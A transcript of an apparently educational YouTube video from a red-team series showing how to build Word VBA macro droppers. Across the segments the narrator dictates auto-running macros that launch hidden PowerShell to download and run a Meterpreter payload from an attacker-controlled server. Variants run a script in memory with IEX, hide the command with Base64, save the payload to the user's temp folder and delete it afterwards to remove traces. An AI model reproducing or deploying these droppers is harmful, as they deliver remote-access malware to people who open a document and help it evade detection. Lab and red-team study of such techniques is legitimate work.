# Offensive VBA 0x3 - Developing PowerShell Droppers

## Metadata

- **Channel:** HackerSploit
- **YouTube:** https://www.youtube.com/watch?v=ot3053UxJOc
- **Date:** 28.01.2025
- **Duration:** 55:20
- **Views:** 4,816

## Description

In this episode of the Offensive VBA series, we take VBA macros to the next level by developing PowerShell droppers designed for red team operations. Learn how to craft stealthy and effective VBA scripts that deliver and execute PowerShell payloads seamlessly.

Here's what we'll cover: writing VBA macros to execute PowerShell scripts, executing payloads directly in memory for stealth, leveraging environment variables to identify system paths dynamically, and techniques to remove traces of macro execution for stealthier operations.


// Adversary Emulation Labs
New to CYBER RANGES? Register here: https://bit.ly/40dRMsb
CYBER RANGES Adversary Emulation Labs (Free): https://bit.ly/4amBPEU

🎥 Have an idea for a video? make your submission here: https://forms.gle/VDwwMsuudzQfT9VM6

// MORE RESOURCES
HACKERSPLOIT BLOG  ►► https://bit.ly/3qjvSjK
HACKERSPLOIT FORUM  ►► https://bit.ly/39r2kcY
HACKERSPLOIT ACADEMY ►► https://bit.ly/39CuORr
CYBER RANGES (LABS) ►► https://app.cyberranges.com

// SOCIAL NETWORKS
TWITTER ►► https://bit.ly/3sNKXfq
INSTAGRAM ►► https://bit.ly/3sP1Syh
LINKEDIN ►► https://bit.ly/360qwlN
PATREON ►► https://bit.ly/365iDLK
MERCHANDISE ►► https://bit.ly/3c2jDEn

// MY BOOKS
Privilege Escalation Techniques ►► https://amzn.to/3ylCl33
Docker Security Essentials (FREE) ►► https://bit.ly/3pDcFuA

// SUPPORT THE CHANNEL
NordVPN Affiliate Link (73% Off) ►► https://bit.ly/3DEPbu5
Get $100 In Free Linode Credit ►► https://bit.ly/3yagvix

// CYBERTALK PODCAST 
Spotify ►► https://spoti.fi/3lP65jv
Apple Podcasts ►► https://apple.co/3GsIPQo

// WE VALUE YOUR FEEDBACK
We hope you enjoyed the video and found value in the content. We value your feedback; if you have any questions or suggestions, feel free to post them in the comments section or contact us directly via our social platforms.

// THANK YOU!
Thanks for watching!


## Contents

### [0:00](https://www.youtube.com/watch?v=ot3053UxJOc) Segment 1 (00:00 - 05:00)

Hey guys, HackerSploit here, back again with another video. Welcome back to the Offensive VBA series. In this video we're going to be exploring the different ways you can go about creating a VBA macro that essentially utilizes PowerShell to drop a file, or acts as a dropper. If you're familiar with red teaming or pen testing in general, simply put, a dropper is a payload or an executable that, when executed, downloads another file. In red teaming operations droppers are used to actually download the payload that then performs whatever task or action you want it to perform, so for example spawning a reverse shell, and so on and so forth. The key in this video is to go beyond just downloading the file, but also exploring the process of downloading and executing different types of executables, so configuring our dropper to be versatile and, more importantly, in alignment with operational security in red teaming. This will also involve in-memory execution of PowerShell scripts, because again, EXEs are rarely used, although I will be using them in my example.

So first things first, we're going to be taking a look at quite a few examples. If you're new to the series I would recommend you take a look at episode two, where we explored program and command execution, primarily because I explained a lot about objects there, and objects feature quite a bit in VBA anyway. I'm on my Windows system and I'm going to open up Office, create a new blank document, and save it; I'll go into my desktop here, and we'll just call it dropper, and then we'll save it as a .docm, so a macro-enabled document. Then we'll go into Developer, Macros, select this document and create a macro, just to begin with, called dropper. I'm going to create the subroutine AutoOpen so that when the document is opened the Word macro is automatically executed. In the event of macro security in Word, the user would click on Enable or Run Macro, and then the macro that we are going to develop is going to be executed.

We're just going to create another subroutine here, called PSDropper, something very simple, and we're going to create an object called PSDropper, so Dim; you can call yours whatever you want if you're following along. I'll also be trying, I think, to set up a GitHub repo for this series so you can find these scripts, because there'll be many variations; this is sort of the basic one we're starting off with. We're then going to Set PSDropper, and we're going to create a reference, in this case with CreateObject, and we're going to utilize WScript, so WScript.Shell, and I'll explain what this is if you missed the previous episode. Now we're going to call or utilize the WScript Run method to execute our command, so we're going to say PSDropper.Run, and then we specify our PowerShell command, so powershell.exe, and then we can say -Command. Our syntax needs to be quite accurate here, so because we're now specifying the command we're going to use a double quote there, so Invoke-WebRequest, which we use to download a file, and I'll show you what we'll be downloading and from what system. Then the -Uri is going to be... and this is where you specify the actual URI or URL of the web server that's hosting the file that you want your dropper to download. In my case I've just connected via RDP to my Kali Linux system, just running on my local network; you can see on my desktop that with msfvenom I've created a Meterpreter payload called adobe.exe, and shell.ps1, so a PowerShell one; it's actually a Meterpreter PowerShell payload. So I'm

### [5:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=300s) Segment 2 (05:00 - 10:00)

going to set up a web server on the Kali Linux system here, and I'm going to run it on port 8080. Now the IP address of the Kali Linux system is 192.168.2.24, so let's add that in now: http://192.168.2.24:8080 and then the name of the file is adobe.exe; we'll start with the most basic. Then we're going to specify the -OutFile, so what we want it saved as and where. We'll talk a little bit about utilizing environment variables in PowerShell to identify the user's temporary directory, but in this case we'll go for the most obvious, which is C:\Users\Public, the most obvious staging location that's again used by red teamers, and we'll just call it adobe.exe, so something inconspicuous. Then we're going to say Start-Process, so we'll utilize the PowerShell Start-Process cmdlet and then specify the path to the binary that we actually want to start the process for, or with, if you will. We've already saved it at this point and it's going to be under Users\Public, and the name of the file is just adobe.exe. Now once that is done, we need to close the other ones here and then we'll specify the window style parameter, 0, so it's hidden; again, I cover this in episode two of Offensive VBA. And then False; I'll explain that. So that looks good.

All right, so I think to test this out, it's obviously wise to test and debug while in the IDE; this is typically what red teamers do, and then you can see whether your macro actually reaches out to the web server and does its job, so downloads, or drops I should say, the payload or file that you want it to drop, and then executes it. It doesn't need to execute it; you could just be staging it to be used later. But we can test it out, and I think the best way to test it out is to save this document and open it as a normal user would. So there we are. I just resized my window; you can still see the web server here on Kali, and I've already set up a Metasploit session here; the payload is set correctly, so I'll just run it, because this particular dropper will not only drop the payload but also execute it with PowerShell. Now again, this is very basic; we'll get to the good stuff shortly, but we need to test this out. So I'm going to open up the document, enable content, and let's see if we get a GET request on our web server here. Let's see... nothing. Okay, interesting. That's very strange, so it looks like we need to investigate this a little bit. Macros, Edit. Okay, so let's see where we have gone wrong. Did I specify the address correctly? So 8080, adobe.exe, -OutFile C:\Users\Public\adobe.exe, Start-Process, that looks all right, and then yeah, that should be good. PSDropper.Run, huh, that looks all good. Nothing here, so this is very strange indeed.

In this case, let's see... actually hold on, I still want to continue this. If I now utilize the predefined Document_Open subroutine, I'm going to save this and let's try and run this again. Okay, so presumably the macro is running. Port 8080, yeah, that's correct. Let me just see if I have the correct IP; I indeed do, so .24. Okay, still not working, interesting. Let's do some... actually, yes, I found my mistake. This is a stupendous mistake in fact, and I found it, so I'll just call the object

### [10:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=600s) Segment 3 (10:00 - 15:00)

objDropper, because it's conflicting with the actual subroutine name, so that's an incredibly stupid mistake. So we'll go ahead and open it up again now. Let's check it here; let's see if we get a GET request here. Still nothing, that's very interesting. Macros, Edit, huh, that's very strange. So PSDropper.Run, CreateObject, yeah, that looks good. Let me see, Macros, Edit, let's run it here. Okay, so here it is working, but why is it not working there? Okay, so we should have got the session here. All right, so I'm going to terminate this. Okay, so we got the session; we know it's working; we had two GET requests. Let me do this again here: Call PSDropper. Okay, save that there, save this document, and let us go ahead and run it one more time, or open it again as a normal user would. There we are, so now it's working as it should, and ah, I forgot to run the handler so we can receive our Meterpreter session. I think we should be able to get it; yeah, there we are, fantastic. So a very basic dropper: it reaches out to a remote web server and downloads, in this case, a Windows Portable Executable or PE, which is just basically an executable, and again you don't have to use Metasploit for anything; I'm just showing you how this works.

Okay, so let me kill that session there, because I have a few other examples I want to get into. So let's set up the web server again and I'll now go back into my macros, Edit, let me get rid of this. All right, so that's the first example; let's get rid of this one here and we're going to now take a look at the second example. By the way, I think I told you I was going to mention the options here with regards to False. I mentioned the window visibility or window style, but this parameter here, when utilizing Run in this particular case, is essentially used to control the VBA macro execution. When it's set to False it will execute, in this case, the PowerShell command or code asynchronously, which means the VBA interpreter will not wait for the command to finish before moving to the next line of code, if there is one. If you set it to True, then this will execute the command, or whatever you're trying to execute, in this case the PowerShell command, synchronously, which means VBA will pause until the command is done or has completed execution. So it's just controlling execution in this case. That begs the question: why should we use False? Well, it's obvious: for the purposes or objective of stealth and efficiency, or obscurity, in red team operations, asynchronous execution allows the macro itself to essentially execute quickly, and it doesn't need to wait for the PowerShell command to complete executing.

So let's take a look at the second example, which is fileless execution. As you can obviously tell, this particular macro is very basic and obviously quite stupid and is likely never to work. The reason for that, number one, is the artifacts: you're actually saving a payload to disk, which again even the most rudimentary signature-based antivirus solution will detect. So what's the next logical step in terms of evolving our techniques or our skill? Well, that brings us to execution in

### [15:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=900s) Segment 4 (15:00 - 20:00)

memory, in-memory execution. Now, because this video is specific to creating a PowerShell-based dropper, we are going to need to leverage PowerShell's Invoke-Expression, or IEX, which pretty much allows us to avoid writing payloads or executables, or any file really that we're dropping, to disk, if they are indeed executable; and if they are executable, it allows us to, or will pretty much, execute them directly in memory. Because again this is constrained to PowerShell's IEX or Invoke-Expression, it needs to be typically a PowerShell file, or a PowerShell module if you will. So that's why, if I go back into my Kali Linux system here, that's why I generated the PowerShell payload here; this is a Meterpreter payload, and I believe it still has the same options, or uses the same Metasploit or msfvenom payload, which is the Windows 64-bit Meterpreter reverse TCP payload. So I'll just run the handler here, and we have the web server running and it's hosting all of these files, so shell.ps1. Okay, great.

Let's get rid of this here now and let's take a look at how to create this. I'm going to create a new subroutine called FilelessDropper, so we can be a little bit more explicit, and then I'll just stick to my object name here that we used previously, which is PSDropper, and that's going to be As Object. Then we're going to say Set PSDropper is equal to CreateObject, in this case WScript.Shell, and now we are going to say PSDropper.Run powershell.exe, a bit of stealth, so -NoProfile, and then, because we're using IEX or Invoke-Expression, we're going to need to set the execution policy to Bypass. Then the command is going to be IEX, and then we're going to say New-Object, and we'll utilize Net.WebClient still; I think we used it previously, and then .DownloadString, and then in here http:// and the URL or the address of the server from which you're downloading the file, or that the macro is to essentially get and drop the file or the payload from, so 192.168.2.24 in this case, :8080, and the name in this case is shell.ps1. An executable will not work, because again we're using Invoke-Expression, so it needs to be PowerShell in this case, or something that can be executed. So we'll close this in here and we add three, and then we'll just say 0 for window style, and then False, and that should be good. So it's not going to save anything; that's why we haven't specified a path. I'm now going to save this, and again I'll just open up the document again, and before I do that let me just minimize this so you can actually see it in real time, I mean the Kali Linux system. So there we are, let me just resize the windows accordingly, there we go, clean things up a little bit. So dropper, let's see, shell.ps1... I think I know my mistake. Document, FilelessDropper, PSDropper.Run, CreateObject, yeah, that looks good, powershell, -ExecutionPolicy Bypass, -Command IEX, New-Object, let's see... one second, let me just check this. Okay, so nothing there yet. Let me just try running it here. Oh yeah, my bad, actually hold on, let's get rid of this

### [20:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1200s) Segment 5 (20:00 - 25:00)

here, close this up, hold on, and save that there. Let's open up the document again. Yeah, actually hold on, let's see, AutoOpen, okay, I'm just going to call FilelessDropper, if I can type that in correctly. Okay, let's try this again; I saved that, so let's see this now. Okay, there we are, so yeah, calling... because again I think I messed up the macro names, so I've changed them too much, and then here, there we are: sending stage. Actually, with PowerShell it's probably wise to use a non-staged payload, because in this case this can be quite heavy. Let's see, we should get a session, but regardless, that's how to develop a fileless PowerShell dropper, and again this can be any PowerShell script that you want really; you can also execute a PowerShell command, it really doesn't matter, but because we're focusing on droppers this is what can be done.

We'll wait for that. If I go into Developer here, into Macros, Edit, let me just check and see whether we get it; that would be fairly interesting, but yeah, I think non-staged would work well, even a very basic one. In the next video we'll take a look at my go-to technique for shells: I don't utilize msfvenom or Meterpreter, I utilize powercat, and that's even much simpler. I'll then show you how to include, again if you're not using a dropper to download your payload, how you can include your payload, msfvenom or whatever, even PowerShell Empire, directly in your VBA macro; that will be the video after the next one, and then we can resume the adversary emulation series. Anyway, yeah, I don't think we would have gotten it, so probably, yeah, most likely we would need to have created a non-staged one, because I created a standard staged Meterpreter payload, or maybe even a better option or technique would be to utilize something like an HTA payload. However, in this case let's see, I'm just going to run it one more time. There we are, GET request there. Okay, just going to wait here. When was this made? Yes, okay, that is very strange that we're not getting it now. Anyway, I don't want to waste too much time on this, but I think we should be able to get it because we got the GET request here. Anyway, it's probably wise, let me just stop that there, unless we set EXITFUNC to thread; that actually is probably better. Let's try this again. Okay, very strange; we may have done something. Anyway, I'm going to move on to the next technique; we can leave this running, you get the idea.

So that's the fileless execution. What did I want to cover next? Yes, obfuscation of PowerShell commands, so we're now getting into the more realistic stuff, and as you know this is quite important. Whenever you're developing your macros you always have to be open to the fact that your macro not only might be, but probably will be, analyzed. Again, I'm assuming you're not doing anything malicious, but this is sort of the beginning of the stealthy aspect, and I'll keep it rather simple. The most basic of obfuscation techniques is Base64, so we can actually try that. That's very interesting, anyway; bottom line is that's how that works. So we are going to be Base64

### [25:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1500s) Segment 6 (25:00 - 30:00)

encoding. We can also utilize the in-memory execution, and it can also be a PowerShell file or payload, which means if I'm to generate this again, we say msfvenom x64... actually, we can go for cmd, cmd/windows, let's see, cmd/windows/powershell, no, I want a non-staged one, let me just see here. So we actually don't need powershell; we can go for, let's see, Windows PowerShell reverse TCP, how about this? Okay, so I will generate this and replace that one, so LPORT same thing, shell.ps1. Okay, let's actually try and run this macro once again. Set, in this case we need to configure the handler, so set payload to this and then show options, no modules, and then yeah, let's see if this actually works. We had made three requests previously; let's get that running. Okay, there we go, fourth one, unless my Metasploit has bugged out; that could be the case, because I should be getting the sessions, or PowerShell on the Windows system, because yeah, it is indeed executing it, so I may need to restart the system or kill that process. Just give me a second. All right, so I'm not really sure what the issue is; it may be something stalled here, which is actually a very good thing, because I'm going to outline a technique here as well, or I should say another technique. Let's see, this is still running here; I'm just going to try and open up the doc again. Okay, that executes, all right. Okay, yeah, no problem, so we can actually proceed.

So yeah, the next technique was the obfuscation of commands, so let's take a look at that, more specifically PowerShell commands. In terms of the next example, where we will be obfuscating PowerShell commands, I created a PowerShell script to do the encoding for us, on my desktop here; I'm just going to say Edit. We'll use the PowerShell IDE or editor, ISE I think they call it; actually I should have just opened it up with Word there... not with Word, what am I saying, let's say open with Notepad. So basically what it does is it encodes the following PowerShell command, so IEX; that's what we want to Base64 encode, so pretty much the command that gets and then executes our PowerShell payload in memory. The reason as to why we're using PowerShell, as opposed to any other form of encoding, is primarily to ensure that it aligns with what PowerShell expects, so in this case Unicode, and then just very basic decoding. In my case I've already set the address of the web server hosting the PowerShell payload, which in this case I've modified slightly so that it can actually work. So let me just connect to my Kali Linux system, like so. Okay, all right, there we are, and I'll just explain what was done. What I was able to do is, again, remember I told you the primary issue was the staged payload, so I generated a new

### [30:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=1800s) Segment 7 (30:00 - 35:00)

non-staged payload, just a PowerShell reverse TCP payload, with msfvenom, just called it shell.ps1, and I also set up the handler here, and it is configured to use that particular payload; the options are already set. In this case the only difference is LPORT is set to 1234. We have our web server running here on the desktop; we have shell and adobe, etc. So I'm going to run the web server again, or just launch it, and then now I am going to open up a PowerShell command here, so I'll go into my desktop, let's see, Desktop, and I'll execute encode. There we are, so that's what we want to copy, and of course I think I'll need to copy it like so. Let's go into Notepad; there we are, perfect. So now we'll keep that handy. In our macro we're going to get rid of this here; we'll just call it FilelessDropper, so we have the PSDropper object; we then created the object so that we can access WScript. We're now going to create another object here, not an object, a variable called EncodedCommand; you can use whatever name you want to store the actual encoded command. Let's see, so we have that there; let's separate these two; we'll get rid of this, I'm just going to get rid of this here entirely because I don't think we need it, or not that we don't need it, but it's not really valid. So EncodedCommand, that's going to be equal to the Base64-encoded PowerShell command. This is again very basic obfuscation, but I just want to show you how you can then execute it. So now we can say PSDropper.Run and then powershell.exe; we still specify the execution options or arguments like -NoProfile, -ExecutionPolicy; the reason I'm not using the shorthand or abbreviated format is so that again you understand what I'm doing, otherwise I could have just said -EP, right, but Bypass. Now PowerShell has a cmdlet, as you know, or you may not know, called -EncodedCommand, which allows PowerShell to decode it; in this case it's Base64 that is encoded. Then we'll concatenate and specify the variable that's holding the encoded command; we'll set the visibility to hidden, and False.

Okay, so now let me open up the Kali system here, so we have the web server, and if we take a look at that there, we can see, yeah, all right. So let's run this here; I'm just going to run the handler and then we'll take a look at our web server. So why don't we actually open the document and see it live; we'll do it live. All right, so there we go, the macro should run. Did I... no, we didn't change any name or anything like this. Let's see, let us see. Okay, nothing, so is this my mistake? FilelessDropper, yeah, PSEncodedCommand, that's set correctly, PSDropper.Run powershell -NoProfile -ExecutionPolicy Bypass... ah, my mistake, always my mistake, yeah, syntax is always going to kill me. So we'll open it up again and there we go, we can see it gets shell, and then here, there we are, wonderful, and we get a PowerShell session, and now we can enumerate some system information here, and there we go. So yeah, that's obfuscation, very basic. Now there are other forms of obfuscation that we'll get into, tools like... I can't remember the name of the PowerShell utility that is used, Invoke-Obfuscation or something like that; I can't actually remember it, I think I've covered it in a previous video. In any case, there are other forms of

### [35:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2100s) Segment 8 (35:00 - 40:00)

obfuscation in terms of your macro, because obviously you don't want it to be analyzed, so that will involve first and foremost not being like me and using very descriptive variable names; you want to go for something very random. In fact I'll probably make a video where we analyze the macros generated by Metasploit, or the macro-enabled document generated by Metasploit, so you can see what type of obfuscation occurs there. Anyway, one more technique I think I can show you, just based on how much time we have or how long this video has been: let's try and utilize environment variables for dynamic execution. So, sort of moving away from in-memory execution, let's say we wanted to again save a file, a payload; in this case we'll use the adobe Meterpreter payload. What if we don't want to take any chances in terms of where we want to save stuff, but have the macro dynamically, via PowerShell, detect the user's or specific paths; in this case the most obvious would be the TEMP environment variable, which will essentially allow PowerShell to save it in the target system's or target user's specific temp path, if that has been configured. The way this would look is as follows.

Let me get rid of this here. We're going to create a new subroutine; I'll just call this Sub DynamicDropper, something like this, and then we're going to say Dim PSDropper As Object, and again I know this is a bit repetitive, but then we want to create another variable; we'll call it DownloadPath. By the way, what I'm doing you should not do for variables, because it's pretty obvious what they're doing; from the perspective of stealth these should not be descriptive at all. Anyway, so PSDropper is equal to, in this particular case, CreateObject, and then we're going to say in here WScript.Shell, close that up there, and then now the download path; we're going to set DownloadPath, this is the dynamic aspect, equal to the environment variable, Environ, and then TEMP, so the user's temp directory, whatever that's been configured to, in the form of an environment variable, and then we're going to save it as adobe.txt, not .txt, .exe, my bad; that would not allow us to execute anyway. So we then say PSDropper.Run, and in here we say powershell.exe -Command, and then we can say Invoke-WebRequest, the -Uri is, make sure my syntax is correct there, 192.168.2.24:8080/adobe.exe, and then we also need to specify the out file name and path, so -OutFile, and let's see, -OutFile, yeah, because we're concatenating we need to close that one and then say DownloadPath, concatenate again, and then close that up there and then close the single quote. Then we can say Start-Process, because we want to execute it, although this is not really required; Start... and let's see, okay, so Start-Process and then let us go ahead and specify the download path, so concatenate that there, then we open up a single quote here, and then 0. Okay, that looks solid. Now in here we need to set the correct payload; let's maintain that session

### [40:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2400s) Segment 9 (40:00 - 45:00)

sessions, okay, set payload Windows x64 Meterpreter reverse TCP; this is the payload used to generate adobe.exe, x64, okay. Let me just adjust the position of my keyboard. LPORT, okay, so we have the server; we have adobe.exe here; let's just verify that we've specified everything correctly, yeah, that looks good. So now let me call... okay, we'll try and open up that again, so we'll look out for that now. Okay, there we go, we should get a GET; there we are, fantastic, Meterpreter session, boom, very nice. So where did it save it? Well, it saves it in the user temp directory. On Windows you can access your temp directory using the Run dialog and then %temp%, and we hit Enter, so in here we should find adobe.exe, there we are, very nice, very clean.

Now the main question is, can we create a dropper that not only downloads a payload and executes it, but also has some anti-forensic qualities and cleans up after itself? This is the mark of a good red teamer: to clean the artifacts that you're generating. So we can actually do that. What I'm going to do is, we'll save it in this case... where are we saving it? Let's try, yeah, we'll do it on the desktop, I think that makes the most sense, so you can actually see it: Users\admin\Desktop, okay, so we'll just keep that path ready. I'll now go into the macro here, Macros, Edit, and we'll just call it DynamicDropper. We won't need that; we will not need this as well; the only thing we'll need here is Invoke-WebRequest -Uri, okay, -OutFile, Start-Process, and then now before we do anything else... yeah, we probably need to write this again, because, yeah, so Invoke-WebRequest, let's see, yeah, we probably need to write it again, no problem. So we'll say PSDropper.Run and then powershell.exe; in this case we'll not specify any more options, and we'll say Invoke-WebRequest -Uri and that's going to be http://192.168.2.24:8080/adobe.exe. Let us terminate this session and run it again, just to have it ready. Okay, so where was I? Okay, adobe.exe, right, okay, and then we want to... so we have that there, the URI; then we want to specify the -OutFile; in this case we wanted to save it on the desktop, if you remember, so let's paste that, then we'll just save it as adobe.exe, and then now start the process, right, and then same thing in here, and then we are going to remove

### [45:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=2700s) Segment 10 (45:00 - 50:00)

the item, so delete it once we have executed it. We need to specify what we want removed, so like so, and then we can specify the window style, so Hidden, and then False. That looks good to me. So now let's save this, save that, close this. I want us to pay attention to the desktop here, so what I'll actually do now is I will just drag this slightly here, so that when it opens the doc you'll see adobe.exe saved on this system. So let's open it up. Okay, there we are, it saves it, executes it, and then it should delete it. So let's see, we get the Meterpreter session. Does it delete it? Is it deleting it? I don't know, let's see... maybe a permission thing. Remember there'd be Remove-Item adobe.exe. Did I make a mistake there? No, I did not, that is the correct syntax. It may be because of the permissions, and that's why I didn't want to save it on the desktop, but nonetheless we can actually try this again.

Okay, so I'm just going to go into the macro once more, and instead of saying... we can actually save this in, let's see, what's a directory that can work here: Local Disk, Users, Public. We have the earlier one here, so let us delete that. So we'll use this path, okay. So let me make the modifications: C:\Users\Public, and then remove the item like so, and now let us save that. Okay, just going to terminate this. We'll keep an eye out in this directory here. We have that running, and there we go. So we'll now open up... proper... get a Meterpreter session, adobe here, that should delete it, probably after the process now. But then that means this should have been deleted. So Meterpreter session, not exe... I just want to test something. No, it should have removed it, that's very strange. Remove-Item, that usually does it. Yeah, Remove-Item C:\Users\Public, yeah, that should... that looks good to me. This may be because... I think I know why. This may be... let's see, what if we... let's change the... I just want to try this out here. Going to wait a minute. Did we get a session here? Okay, we

### [50:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=3000s) Segment 11 (50:00 - 55:00)

didn't. Okay, let's delete this one here. This directory we should be able to make changes to, both in terms of writing but also... okay. So I'm just modifying the path here, I just want to see what's stopping it, 'cause I know that, you know, we would need to halt and wait for the... I've modified the payload to use the exit function as thread instead of process, which might be the reason why it's not deleting it, but I've set the path to the temp directory for the admin user. What I want to do within the macro is, let's see, so Remove-Item, let's try and see if I can fix this, so -Path, and can we actually specify... yeah, we can say -Force over here, let's try that. Okay, let me run this again and then we'll monitor; we should find the adobe file downloaded here. So let me go ahead and start that again. Okay, so there we are, we see adobe here. Yeah, we should have the permissions to do that. Still nothing. So we get the session, let's exit it... just a second, just want to debug this a little bit. Yeah, we should be able to delete that. That's very strange indeed. Yeah, no special permissions here, yeah. Okay, all right, let's try something else here in the macro again. Apologies if this video is too long, but... so -Force, and then, okay, so -Command... let's say, let's not use any profile, so -NoProfile, -ExecutionPolicy Bypass, -Command, and then Invoke-WebRequest, yeah, that's fine, -OutFile, Start-Process, let's see, saves it in there, now we can tell this to wait, -Wait, okay, and then Remove-Item, yeah, and then -Force that, and then set this to True for synchronous execution. Oh wait, hold on, okay, wait, that was just the Windows stuff, sorry, the Office stuff. So let's run, and then over here, once we have that going, okay, so that works, we have adobe in here, yeah, so it's going to wait for that to execute, and then let's say if I hit exit, shuts it down, then it opens. Yes, okay, so in this particular case you'd need to migrate. So that's how you can go about cleaning it.

Anyway, it's always good to go back to the basics, 'cause I'd sort of forgotten about that, and that's why the asynchronous and synchronous execution is so important; in this case, you know, we're essentially stalling Word. But yeah, that's quite interesting. So yeah, I don't want to make this video too long. Those are the techniques that I wanted to outline; there's quite a bit I covered in this video, and again, you know, now we can move directly to the other stuff before resuming the adversary emulation series. Hopefully this, you know, at least introductory set of videos has been useful. With that being said,

### [55:00](https://www.youtube.com/watch?v=ot3053UxJOc&t=3300s) Segment 12 (55:00 - 55:00)

that's going to be it for this video, guys. Thank you very much for watching. If you have any feedback or questions, leave them in the comment section. If you found value in this video, or liked it, or enjoyed it, leave a like down below, and I will be seeing you guys in the next video.

---
*Source: https://ekstraktznaniy.ru/video/20358*